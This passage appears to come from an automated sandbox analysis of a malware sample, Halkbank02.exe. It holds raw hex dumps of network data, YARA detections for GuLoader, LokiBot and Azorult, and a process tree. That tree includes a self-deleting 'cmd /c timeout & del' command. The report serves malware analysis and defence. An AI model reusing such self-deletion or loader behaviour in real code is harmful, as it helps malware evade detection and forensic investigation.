ce 31 55 5f e7 3d 79 5c 61 05 90 d0 db 69 96 5d 9c 4e 3a d1 e3 8d 33 10 de f9 36 79 9f 43 47 25 57 e8 62 60 6c 13 71 d3
                                                                              Data Ascii: dnh"8WBhm,XueK)VCy<z!v0HEI6m51gWyS7Bn\g1`crO{%.r.AL0c{oe4h"TZY`)Ai2ei;m)&dl+SPq w1U_=y\ai]N:36yCG%Wb`lq
                                                                              2021-09-15 08:52:38 UTC104INData Raw: 97 f1 f6 37 ff 3d 44 72 54 74 a7 c2 b8 ce a7 8c e4 40 bd 02 4c 78 cc c7 77 71 c6 db f4 f9 ee 65 5c e1 10 1d c4 34 39 13 7a 79 ab cf 59 32 92 b5 fc 4e c9 33 11 18 f6 61 cf 94 a9 d6 a5 7e 91 0b 32 fe f1 46 ea ec d2 fb 37 1b 7f c1 2d 0b f6 18 62 17 fa ff c5 99 bf f1 1e 70 83 58 ee de f2 60 ef 80 87 c5 ac 0e 1c 20 5c 15 c7 ee 4d 1d e0 d9 d6 a1 9a 99 57 a0 38 62 91 9b 04 90 4d 8a e3 1c 1b 94 e0 c0 f4 fa c1 4c eb 4f 8a 86 9c d6 b2 57 c7 c4 39 dc 51 69 b7 f0 38 8d ec c8 95 75 1a 8f 45 0f 2e bd 47 38 aa 81 68 17 a2 d0 d3 69 92 40 9b 27 96 51 6f 75 df e8 95 75 53 a1 d0 13 25 90 19 18 f6 c0 fc 14 60 fa 95 2a 9d 3a 8f e5 9d ca b3 39 d3 b3 5b 0d 49 48 9e d2 37 01 1f 91 c2 52 ef 11 69 7a 8b cb 8b 18 1c 8c 52 1e 80 63 f4 84 ff 3d bb 39 89 f9 90 19 77 90 14 12 29 3b 24
                                                                              Data Ascii: 7=DrTt@Lxwqe\49zyY2N3a~2F7-bpX` \MW8bMLOW9Qi8uE.G8hi@'QouuS%`*:9[IH7RizRc=9w);$
                                                                              2021-09-15 08:52:38 UTC105INData Raw: 46 6c a3 39 45 08 31 d4 08 bd 29 59 2c 5a fd 8b be 7a 4b 65 cc 83 3a 36 dd 7c 02 67 01 ef a4 fe b7 3e e6 b3 57 a3 d6 fe 4e 73 fa 77 6c ab 67 21 dd ad a0 50 cc ba cb 81 d2 3a d5 18 df 80 d8 df 50 03 55 fe 62 e4 84 c1 9e 85 12 66 25 b8 69 9b 28 c3 c5 58 8b c6 ac 39 de 39 66 a3 de 2d b8 39 3f 59 fc 43 6c 13 f9 2e 33 2f 9a fa 4d 87 75 09 f1 c7 e5 5a 98 83 bf cb f3 0a 6a d0 03 d6 32 42 e5 64 36 b7 b7 bf eb 41 08 6a 18 5a 8c 3d ab 31 0d 35 2c 12 4f ac de e1 e8 f1 81 40 88 63 3d bc c3 14 a5 41 6b 53 e2 47 a5 20 dd 74 23 d2 f0 dc 79 87 7b 4e 5c 56 68 49 35 f2 90 7e 3e 4c cc ef 91 f5 73 12 15 80 08 62 17 9c 9e b2 78 14 3f 28 81 a9 24 10 13 dd 53 60 d0 af 34 02 7e 6b 4d c0 56 ea 1d 86 41 ce 2a 22 d2 4f bd 50 2e 86 ef f4 a9 ba 84 0c a3 f8 f8 4a a0 8a 90 f8 1b c2 45
                                                                              Data Ascii: Fl9E1)Y,ZzKe:6|g>WNswlg!P:PUbf%i(X99f-9?YCl.3/MuZj2Bd6AjZ=15,O@c=AkSG t#y{N\VhI5~>Lsbx?($S`4~kMVA*"OP.JE
                                                                              2021-09-15 08:52:38 UTC107INData Raw: 80 7b 8d 00 01 3d 37 de bc fa 82 9b 10 f9 c7 f9 ba 0f 8a 20 fc 1e ec ca 60 24 d8 20 8d 2f 75 0b e1 f2 d1 09 bf 1d 96 c5 8c a6 e7 42 2e 21 ea b7 91 50 5a 9b 20 30 5f d9 23 f3 39 33 56 bf f3 1a fe 5a 42 b5 c5 a1 79 07 eb 50 ee e0 da 5e 35 f4 ea e7 88 02 13 c1 8b 45 1b 40 c2 26 80 6c 07 6f ae 8c 9c c4 55 68 d3 59 5a ef d6 a3 e7 32 81 01 c4 10 6e d5 20 cd 31 17 31 07 c7 29 5d 4d d6 b9 c3 1a 31 0d 0d 7a f3 af 7b 80 4f 50 64 55 ea 52 bf b4 b7 ca d6 4e 8a 00 93 83 30 be 8e a9 29 aa 94 44 ce f2 d8 88 f9 05 62 e3 04 25 54 25 c8 e4 3f 78 cf ec 63 ad 71 59 11 1c 85 2f 2a 2d 68 ec 51 84 1a 91 e5 56 f1 52 f2 1e 39 97 ea 0f 35 e2 8d 37 45 b9 ca 4c f2 a4 a5 a7 65 b5 a2 13 36 5b 11 00 bd 86 7a 89 be dc 72 6e a1 41 6b 37 c1 bd cd f9 7a 7f 2d a1 92 64 3d eb 3f e8 17 c8 f8
                                                                              Data Ascii: {=7 `$ /uB.!PZ 0_#93VZByP^5E@&loUhYZ2n 11)]M1z{OPdURN0)Db%T%?xcqY/*-hQVR957ELe6[zrnAk7z-d=?
                                                                              2021-09-15 08:52:38 UTC108INData Raw: 40 a9 b3 b5 e1 c9 17 21 3c 82 50 29 db 2a 53 6e 70 1b df ca b3 62 d2 8c 3f 38 87 67 83 1d 56 f0 dd 74 99 a8 c0 7f 3c a4 43 d0 f5 bf cb 54 80 0c ff 56 f9 da 16 39 71 df 87 c0 db 08 b8 52 b0 f3 a8 91 af 84 e5 3f 6b 4d 4d 17 d2 b5 78 00 f9 92 d4 93 78 05 a0 6f b5 0b 76 e8 8f 78 e1 e2 d4 b8 ed e1 eb 4c 4f 5a e8 7d 99 3d fd 3a e4 e0 c9 20 12 2c 12 15 81 b2 75 3a 29 72 38 37 27 a3 42 ae 97 25 f0 f7 5c 57 4a d9 df 85 a7 56 46 76 c5 36 a8 e8 4e 1a e7 da 1d c8 7b 54 d1 80 4d e4 b0 1b b1 f8 f2 e3 49 f4 7f e2 e1 ff ca 16 4c ad d3 e3 0d 03 ce 6a b9 ff 27 f5 3b b7 37 c3 1f e8 ef 72 4c 6b 47 c8 fa 19 73 bc 30 58 fc 6f 3d 08 3b 26 47 78 61 d2 3e af 65 84 fa cc e3 23 71 fd 17 e0 4c 15 27 1a 26 2d 4a 3d 03 80 cd ba 2e 0d 63 ef 5d e8 3e ee 2b 2e f4 03 cb a0 b8 11 db 7b 7b
                                                                              Data Ascii: @!<P)*Snpb?8gVt<CTV9qR?kMMxxovxLOZ}=: ,u:)r87'B%\WJVFv6N{TMILj';7rLkGs0Xo=;&Gxa>e#qL'&-J=.c]>+.{{
                                                                              2021-09-15 08:52:38 UTC109INData Raw: 80 e6 c2 30 9a fa e8 c7 6a 11 05 ce 16 5b c9 e9 b0 c3 a2 24 c0 f5 64 e6 31 3e 78 cf 84 c3 ec 37 d9 9b f0 54 3e db 95 a2 99 11 84 94 10 4f a8 76 3f d3 bc f0 42 03 bd 49 c8 73 df 3e fd 35 b3 44 8e 5b 58 5c 61 a3 13 ee cb 10 00 51 53 7b 89 bc 0a 73 6e b9 97 6a 37 ef 6b cc f9 38 a9 2c a1 c2 b2 3c eb 5f 3e 16 c8 8a 83 bd 48 33 4c a9 86 f4 fd 18 ad f8 1e ac d4 b0 6b 90 65 4d 71 e6 8c a3 47 30 60 44 10 00 8d 28 b3 d0 ee 19 d0 2a 20 55 6e ec b2 6d 8f 35 ab 2e 8d 66 3a af 3c 08 6f 03 9a 1d 83 e4 c3 9d 90 b2 70 91 49 0d 07 9d fc 0f 45 d8 90 a8 0e 23 17 46 6c a3 54 2e 0f 43 d2 6d b5 1a 45 02 49 91 86 be 16 4b 09 88 83 56 27 a9 37 41 74 68 fe cd ee d6 7e b5 bb 34 b5 bf f9 20 17 fa 59 20 ad 06 3f b8 8b d2 5a b8 b8 a8 90 be 06 b0 12 ab 87 b7 c5 50 70 55 d2 27 e7 f0 c6
                                                                              Data Ascii: 0j[$d1>x7T>Ov?BIs>5D[X\aQS{snj7k8,<_>H3LkeMqG0`D(* Unm5.f:<opIE#FlT.CmEIKV'7Ath~4 Y ?ZPpU'
                                                                              2021-09-15 08:52:38 UTC111INData Raw: 53 cf 15 d1 90 c0 c0 dc 42 0c dc b4 92 ef d0 28 9a 29 be 89 88 ef 8d a7 56 80 2b bc 8b 13 ca 48 5f 8a a1 37 ff d5 a9 ac c5 fb 53 01 29 5f 3d 24 0c 91 7d 95 80 c7 67 5f e6 e2 39 61 f6 aa 8b 09 d1 50 f9 ac 59 d3 d9 74 f0 86 54 27 c2 d2 09 26 14 bf a4 82 8c 8d 29 00 bb 94 a9 3e 12 a7 0a 98 da 0f 84 fc 56 13 3a 7b 93 a6 f2 29 c9 6b 6d a4 f2 c0 88 9e b1 f0 35 01 e6 ca 3f d5 6b c2 0c dc 62 0d 83 15 37 b2 fe c8 0c 8a 4c 78 95 7b 85 9b bf 3d 76 65 d9 5f b5 e7 d9 27 92 1b b5 e4 97 1c 1b 09 ce 01 78 36 7e e7 df dd 19 79 74 94 2f fb 5d 25 d9 e9 dc f3 0c 09 3b 8d ec 8f 18 43 ed 08 c9 f6 ce b0 f4 a2 21 1b 26 e9 2f 2f 5e ec f6 f9 01 ac 68 10 6f 75 df 43 da b0 df 0a 32 d9 2c 03 a4 92 78 aa 20 ea 9f 18 7c 3f 50 f7 5e 3b f9 a6 b3 39 3b f0 93 96 ff ab 72 36 a0 9f 8c 10 49
                                                                              Data Ascii: SB()V+H_7S)_=$}g_9aPYtT'&)>V:{)km5?kb7Lx{=ve_'x6~yt/]%;C!&//^houC2,x |?P^;9;r6I
                                                                              2021-09-15 08:52:38 UTC112INData Raw: 1c ac 54 78 ab 74 3b c8 73 0c 2f 5c 81 e0 af bb d8 9b a4 1f 39 59 a9 9b 41 e8 ed ef 16 51 16 8c 72 cc 97 fd 71 d6 05 7d 3c 13 1d aa 18 cf c9 01 8a 97 7e 9e f9 79 0f 89 e8 85 37 d8 34 62 91 7f 82 ea d3 dc 61 c9 e0 8c 78 3d cc 6e 5a 8b 51 19 eb aa 96 58 fa a1 fd 84 e4 d4 e3 ff e9 7d ee 0b 66 d5 63 60 54 3e b2 67 a8 24 24 d4 13 4d 5f 00 1e 5e f3 d4 bd 5a 9a 5d e9 49 51 d4 e9 60 8f 25 08 01 cb 63 5b 3c ce 1e 04 58 ad e5 7a 8d 42 1c c6 d6 d2 d0 af 0c 88 7d c4 ab 5d 5b 34 24 05 d2 d2 f1 01 21 80 29 dc f1 3f c2 2f 89 bb 9a 9c 74 35 4d 14 64 77 c7 e6 a4 d0 82 b9 17 b0 54 05 a4 fb 05 9d 7f 53 34 da cc 62 a6 1a f3 1b 59 c8 60 41 1a 43 ee 64 f9 50 a6 0d 58 a8 c9 06 ef f4 6a a9 10 4b f3 2d 7e 30 35 2e e9 a7 cb 41 53 06 68 b8 ef 1d 48 2a f6 6a 2b e9 f7 0d 7f 47 01 74
                                                                              Data Ascii: Txt;s/\9YAQrq}<~y74bax=nZQX}fc`T>g$$M_^Z]IQ`%c[<XzB}][4$!)?/t5MdwTS4bY`ACdPXjK-~05.AShH*j+Gt
                                                                              2021-09-15 08:52:38 UTC113INData Raw: d5 a5 57 7d 5d 67 ba 79 2e bf 4e 13 56 b2 37 8e fb 77 83 a3 4b 94 a6 c5 9b cc 7b 42 ba a7 a5 5a 79 27 be ca fb 4d 04 84 42 fe b1 e5 ee e1 f4 37 5a 23 b9 2a 1c de df 7c 8d f0 eb b2 60 c7 46 6d 33 0e e2 6b 6d 8d a5 93 5d 02 d4 f0 ff 99 d9 9d 43 1c 6e 75 f1 50 6b bf fe 87 0d 05 8b b7 c7 e4 f1 47 76 af ca 90 4d 49 fa 95 da 6a cb 87 01 d6 d3 0a bc e4 2a 48 bf df 13 09 f7 2f 89 6e 32 05 d3 47 a9 a5 27 c5 e6 de 26 2e e0 7e 9b fe b7 78 bf f3 58 b5 5b 7c 07 76 50 6c f0 06 3c 45 e1 06 99 d3 06 1c 57 99 c4 a4 22 7d 78 ed 3d c2 dd 91 fa 05 80 d7 90 05 b2 5b df e6 08 b3 c2 d6 11 fd 28 5d f6 4b 63 bb c1 12 fa 2e 3c 84 cc c2 f0 4f 07 b8 f7 42 fb 23 49 d4 a2 11 3e 01 e2 66 c0 b0 28 81 cb cb 77 bf 37 ca eb 95 41 a5 3b 86 e8 54 4b 24 a1 2e 0e ab c8 45 60 6c a0 ec 98 6e 0c
                                                                              Data Ascii: W}]gy.NV7wK{BZy'MB7Z#*|`Fm3km]CnuPkGvMIj*H/n2G'&.~xX[|vPl<EW"}x=[(]Kc.<OB#I>f(w7A;TK$.E`ln
                                                                              2021-09-15 08:52:38 UTC114INData Raw: 09 6f 8e e4 b6 88 67 04 f1 1a 5f a9 42 24 f2 3b dd ef 78 79 fb b3 9d 0d 26 a3 5b a6 8b 23 d5 d4 21 88 0e c5 a7 3d b4 4a 9d 36 3d a1 a8 f6 cd 95 f0 07 62 a1 b6 66 49 dc 5d 90 3a 08 26 12 d5 c0 65 11 a6 51 4b d1 00 71 cf d5 d8 01 ee b1 23 4a 90 e8 8c 28 e0 85 c2 69 cd 94 d9 49 21 0c 87 f5 30 9f 76 76 81 7a 4f a1 4e 7e 15 55 02 59 87 9f 94 ce 73 ec 00 5e d7 3b 46 c8 85 7d 86 9c 97 eb 85 83 69 3b 73 09 60 b0 62 5c cb 0b 59 1a 11 a3 52 2a e1 6b 8c a9 93 d4 63 06 77 8e d8 0c 20 34 5f f0 a0 4e 2f 0a 5c a9 4f de aa 5c 8c ca 04 bf 3f f3 b6 1d 1b 42 c9 7c d0 f1 03 5c 21 42 d4 30 2f 3b 45 d8 97 c3 63 46 b1 e1 34 b5 30 78 07 7b 1c e3 5e 16 fc 64 25 20 1b ec e3 41 9c b2 c9 da 41 0b d3 21 63 aa 57 94 be 3b 60 56 75 9a 0e 8f 3f 59 46 7f 68 df a2 99 08 c3 37 78 f5 db 18
                                                                              Data Ascii: og_B$;xy&[#!=J6=bfI]:&eQKq#J(iI!0vvzON~UYs^;F}i;s`b\YR*kcw 4_N/\O\?B|\!B0/;EcF40x{^d% AA!cW;`Vu?YFh7x
                                                                              2021-09-15 08:52:38 UTC115INData Raw: 47 c0 d6 72 4e 17 fa 01 5c a6 57 dd ed 7c 90 f2 fc 90 fa ae e3 25 e4 fa ee 4a e9 04 61 b8 64 0c 53 78 b5 5c af d3 20 f7 17 9d 5a d9 1b e2 f6 70 b8 7b 9f ad ed 55 52 e6 ea 7c 8c 70 0b 44 c8 a8 58 ef cd e7 07 b9 ae 52 79 05 41 8a c5 ae d0 49 ad d1 8a a9 c5 6a 5c 71 35 32 04 b8 d3 e3 00 1c 81 ee dc 00 3f 73 2f 1f bb e0 9c bc 3a a1 1b 98 78 f1 e6 b9 d0 e1 b9 7e b0 4b 05 95 fb 80 9d 06 51 60 d8 ef 60 a7 18 08 19 78 ca 40 43 5e 41 9a 66 77 53 33 0e d3 ab be 05 49 f0 0a ad 66 4f b0 29 44 34 d5 2b 0c a2 ca 45 57 02 0a bc 8c 19 07 2e 38 6e c7 ed 16 09 fa 43 81 70 8d 68 c9 23 8b 7f b5 14 0f ec 05 83 f4 10 1b d1 7d 97 50 ba d8 9d c4 c7 08 9f aa af e8 24 9d 7a cd 43 4f b5 8e 9e 26 0b d8 4d 13 a9 8f f3 75 ea f6 03 14 2f b9 d2 2b 2a c0 54 56 ef 5a 26 a9 8d 1d f5 87 03
                                                                              Data Ascii: GrN\W|%JadSx\ Zp{UR|pDXRyAIj\q52?s/:x~KQ``x@C^AfwS3IfO)D4+EW.8nCph#}P$zCO&Mu/+*TVZ&
                                                                              2021-09-15 08:52:38 UTC116INData Raw: 6a f1 a2 94 5a 1e d3 13 f9 43 df c9 42 87 6f c7 f0 d9 6a 84 fc fb 0f 67 89 74 c5 19 f3 88 75 69 c9 20 4e e2 f9 9d d6 7e c7 c5 0d 85 df ae b1 4d 27 b6 b2 48 1e 65 fb 4d 85 a4 3e f9 df 6e a5 a4 2b 94 ea 1b 29 79 ef 1f 94 79 bb ff b3 10 54 04 57 f4 0b db 5d d6 fd a8 31 91 ec d7 94 fc 0b 3d 5a 8a c9 b5 2f 3a 75 64 31 6b d1 ed f6 46 8c c5 9c ca b7 8d da 3f 0d 9a 7a e9 29 62 10 05 ce 12 6b e4 c9 3e f2 69 34 50 c5 63 fa c3 0d 2e fd 6f f0 1b 42 08 ae e6 32 d5 ee cd cc c5 24 45 c6 d2 7b 28 3b ec e4 ab 4e 72 34 be e6 56 45 88 af 46 03 33 c5 90 6d 44 a2 87 9a 28 0e 44 29 62 85 06 42 18 86 45 4a 4c 98 0e 52 4b f8 2e f4 61 43 e2 14 09 ab d8 04 2a 06 2e 2e 19 c1 b0 85 a2 74 75 91 7c 41 25 23 be 58 d0 97 f2 24 87 ab 5a 77 35 dc de 5d f7 0b 0b aa b6 3b f3 f6 e0 eb 61 d3
                                                                              Data Ascii: jZCBojgtui N~M'HeM>n+)yyTW]1=Z/:ud1kF?z)bk>i4Pc.oB2$E{(;Nr4VEF3mD(D)bBEJLRK.aC*..tu|A%#X$Zw5];a
                                                                              2021-09-15 08:52:38 UTC118INData Raw: 07 3e 3c cc 8a 91 f5 73 02 15 80 08 36 17 f9 9e de 78 71 3f 4f 81 db 24 71 13 b0 53 60 d0 af 34 22 7e 6b 4d 84 56 d2 1d b1 41 f9 2a 64 d2 78 bd 68 2e b5 ef b0 a9 8f 84 26 a3 d4 f8 27 a0 eb 90 88 1b e8 45 50 7c fd 8a 54 a1 c9 34 d8 6d 12 a9 47 f3 75 ea e1 33 38 1f ed e2 42 1a 51 64 f0 df 94 16 4a bd 16 c4 a7 32 80 37 c5 f2 6f a9 4e 56 2d 9b 1d 20 bc 15 d1 90 84 a5 b0 27 78 b9 f2 fb 83 b5 7f 9a 29 be ca fa 8a ec d3 33 c4 42 ce ee 70 be 27 2d f3 f6 37 ff d5 a9 ef aa 8b 2a 47 40 33 58 73 0c f6 19 fc b3 f5 49 3b 8a 8e 39 61 f6 f9 ee 65 b4 33 8d e3 3b b9 bc 17 84 86 54 27 c2 96 6c 4a 71 cb c1 cd ee e7 4c 63 cf 94 a9 3e 12 e3 6f f4 bf 7b e1 b8 15 13 3a 7b 93 e5 80 4c a8 1f 08 e7 9d ad f8 ff c5 99 57 6d 83 8e 7c d5 6b c2 0c 9f 10 68 e2 61 52 f1 91 a5 7c eb 38 11
                                                                              Data Ascii: ><s6xq?O$qS`4"~kMVA*dxh.&'EP|T4mGu38BQdJ27oNV- 'x)3Bp'-7*G@3XsI;9ae3;T'lJqLc>o{:{LWm|khaR|8


                                                                              Code Manipulations

                                                                              Statistics

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              Analysis Process: Halkbank02.exe PID: 5488 Parent PID: 5472

                                                                              General

                                                                              Start time:10:47:46
                                                                              Start date:15/09/2021
                                                                              Path:C:\Users\user\Desktop\Halkbank02.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\Halkbank02.exe'
                                                                              Imagebase:0x400000
                                                                              File size:114688 bytes
                                                                              MD5 hash:A4CB6740C9195C5579ACEF4F7C8E40C7
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Visual Basic
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.562813823.00000000022A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000001.00000002.559362429.0000000000410000.00000020.00020000.sdmp, Author: Florian Roth
                                                                              • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000001.00000000.235153506.0000000000410000.00000020.00020000.sdmp, Author: Florian Roth
                                                                              Reputation:low

                                                                              Analysis Process: Halkbank02.exe PID: 5680 Parent PID: 5488

                                                                              General

                                                                              Start time:10:50:16
                                                                              Start date:15/09/2021
                                                                              Path:C:\Users\user\Desktop\Halkbank02.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\Halkbank02.exe'
                                                                              Imagebase:0x400000
                                                                              File size:114688 bytes
                                                                              MD5 hash:A4CB6740C9195C5579ACEF4F7C8E40C7
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000001C.00000002.900879617.000000001F410000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001C.00000000.557106702.0000000000410000.00000020.00020000.sdmp, Author: Florian Roth
                                                                              • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000001C.00000002.900905974.000000001F43C000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Analysis Process: cmd.exe PID: 2920 Parent PID: 5680

                                                                              General

                                                                              Start time:10:52:54
                                                                              Start date:15/09/2021
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Halkbank02.exe'
                                                                              Imagebase:0xbd0000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Analysis Process: conhost.exe PID: 4016 Parent PID: 2920

                                                                              General

                                                                              Start time:10:52:55
                                                                              Start date:15/09/2021
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6b2800000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Analysis Process: timeout.exe PID: 6500 Parent PID: 2920

                                                                              General

                                                                              Start time:10:52:55
                                                                              Start date:15/09/2021
                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\timeout.exe 3
                                                                              Imagebase:0x220000
                                                                              File size:26112 bytes
                                                                              MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Disassembly

                                                                              Code Analysis

                                                                              Reset < >